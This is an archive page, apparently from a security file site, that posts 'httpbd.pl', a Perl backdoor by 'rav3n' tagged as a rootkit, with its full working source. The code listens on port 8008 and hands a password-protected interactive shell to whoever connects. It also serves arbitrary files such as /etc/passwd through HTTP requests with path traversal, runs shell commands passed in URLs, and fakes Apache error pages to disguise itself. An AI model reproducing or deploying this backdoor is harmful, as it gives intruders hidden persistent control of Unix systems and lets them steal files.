what you don't know can hurt you

httpbd.pl.txt

httpbd.pl.txt
Posted Sep 23, 2005
Authored by rav3n

httpbd.pl is a small backdoor written in perl that poses as httpd. It can spawn a shell and transfer files.

tags | tool, shell, perl, rootkit
systems | unix
MD5 | e96c0debb82cfb8f22165e943001f0ba

httpbd.pl.txt

Change Mirror Download
#!/usr/bin/perl

# httpbd.pl Usage:
# 1. bind shell:
# nc target 8008
# ->SHELLPASSWORD{ENTER}{ENTER}
# 2. download files
# http://target:8008/file?/etc/passwd
# or
# http://target:8008/file?../some/file
# 3. http shell
# http://target:8008/shell?id;uname -a
# Author: [ rav3n nomail@host.com ]

use Socket;

$SHELL="/bin/sh -i";
$SHELLPASSWORD="skides";
$LISTENPORT="8008";
$HTTPFILECMD="file";
$HTTPSHELLCMD="shell";

$HTTP404= "HTTP/1.1 404 Not Found\n" .
"Date: Mon, 14 Jan 2002 03:19:55 GMT\n" .
"Server: Apache/1.3.22 (Unix)\n" .
"Connection: close\n" .
"Content-Type: text/html\n\n" .
"<!DOCTYPE HTML PUBLIC \"-//IETF//DTD HTML 4.0//EN\">\n" .
"<HTML><HEAD>\n" .
"<TITLE>404 Not Found</TITLE>\n" .
"</HEAD><BODY>\n" .
"<H1>Not Found</H1>\n" .
"The requested URL was not found on this server.<P>\n" .
"<HR>\n" .
"<ADDRESS>Apache/1.3.22 Server at localhost Port $LISTENPORT</ADDRESS>\n" .
"</BODY></HTML>\n";

$HTTP400= "HTTP/1.1 400 Bad Request\n" .
"Server: Apache/1.3.22 (Unix)\n" .
"Date: Mon, 14 Jan 2002 03:19:55 GMT\n" .
"Cache-Control: no-cache,no-store\n" .
"Connection: close\n" .
"Content-Type: text/html\n\n" .
"<!DOCTYPE HTML PUBLIC \"-//IETF//DTD HTML 4.0//EN\">\n" .
"<HTML><HEAD><TITLE>400 Bad Request</TITLE></HEAD>" .
"<BODY>" .
"<H1>400 Bad Request</H1>Your request has bad syntax or is inherently impossible to satisfy.</BODY></HTML>\n";

$HTTP200= "HTTP/1.1 200 OK\n" .
"Cache-Control: no-cache,no-store\n" .
"Connection: close\n";

$protocol=getprotobyname('tcp');
socket(S,&PF_INET,&SOCK_STREAM,$protocol) || die "Cant create socket\n";
setsockopt(S,SOL_SOCKET,SO_REUSEADDR,1);
bind (S,sockaddr_in($LISTENPORT,INADDR_ANY)) || die "Cant open port\n";
listen (S,3) || die "Cant listen port\n";
while(1)
{
accept (CONN,S);
if(! ($pid=fork))
{
die "Cannot fork" if (! defined $pid);
close CONN;
}
else
{
$buf=<CONN>; chomp($buf); $buf=~s/\r//g;
M1:
while($s= <CONN>) {
if($s=~/^\r?\n$/) { last M1; }
}
if($buf eq $SHELLPASSWORD)
{
open STDIN,"<&CONN";
open STDOUT,">&CONN";
open STDERR,">&CONN";
exec $SHELL || die print CONN "Cant execute $SHELL\n";
}
elsif($buf=~/^GET \/$HTTPFILECMD\?([^ ]+) HTTP\/1\.[01]$/)
{
$file=$1;
$file=~s/%([0-9a-f]{2})/chr(hex($1))/ge;
print CONN $HTTP200;
print CONN "Content-type: text/plain\n\n";
open (HTTPFILE,$file) || goto M2;

while(<HTTPFILE>)
{
print CONN $_;
}
close HTTPFILE;
}
elsif($buf=~/^GET \/$HTTPSHELLCMD\?([^ ]+) HTTP\/1\.[01]$/)
{
$shcmd=$1;
$shcmd=~s/%([0-9a-f]{2})/chr(hex($1))/ge;
$out=`$shcmd`;
print CONN $HTTP200;
print CONN "Content-type: text/html\n\n";
print CONN "<body bgcolor=black>\n<font color=white>\n";
print CONN "<pre>".$out."</pre></font></body>\n";
}
elsif($buf=~/^GET \/ HTTP\/1\.[01]$/)
{
print CONN $HTTP200;
print CONN "Content-type: text/plain\n\n";
}
elsif($buf=~/^GET (\/[^\/]+)+ HTTP\/1\.[01]$/)
{
print CONN $HTTP404;

}
else
{
print CONN $HTTP400;
}
M2:
close CONN;
exit 0;
}
}

Comments

RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

File Archive:

February 2020

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Feb 1st
    1 Files
  • 2
    Feb 2nd
    2 Files
  • 3
    Feb 3rd
    17 Files
  • 4
    Feb 4th
    15 Files
  • 5
    Feb 5th
    24 Files
  • 6
    Feb 6th
    16 Files
  • 7
    Feb 7th
    19 Files
  • 8
    Feb 8th
    1 Files
  • 9
    Feb 9th
    2 Files
  • 10
    Feb 10th
    15 Files
  • 11
    Feb 11th
    20 Files
  • 12
    Feb 12th
    12 Files
  • 13
    Feb 13th
    18 Files
  • 14
    Feb 14th
    17 Files
  • 15
    Feb 15th
    4 Files
  • 16
    Feb 16th
    4 Files
  • 17
    Feb 17th
    34 Files
  • 18
    Feb 18th
    15 Files
  • 19
    Feb 19th
    19 Files
  • 20
    Feb 20th
    20 Files
  • 21
    Feb 21st
    15 Files
  • 22
    Feb 22nd
    2 Files
  • 23
    Feb 23rd
    2 Files
  • 24
    Feb 24th
    16 Files
  • 25
    Feb 25th
    37 Files
  • 26
    Feb 26th
    15 Files
  • 27
    Feb 27th
    15 Files
  • 28
    Feb 28th
    4 Files
  • 29
    Feb 29th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2016 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close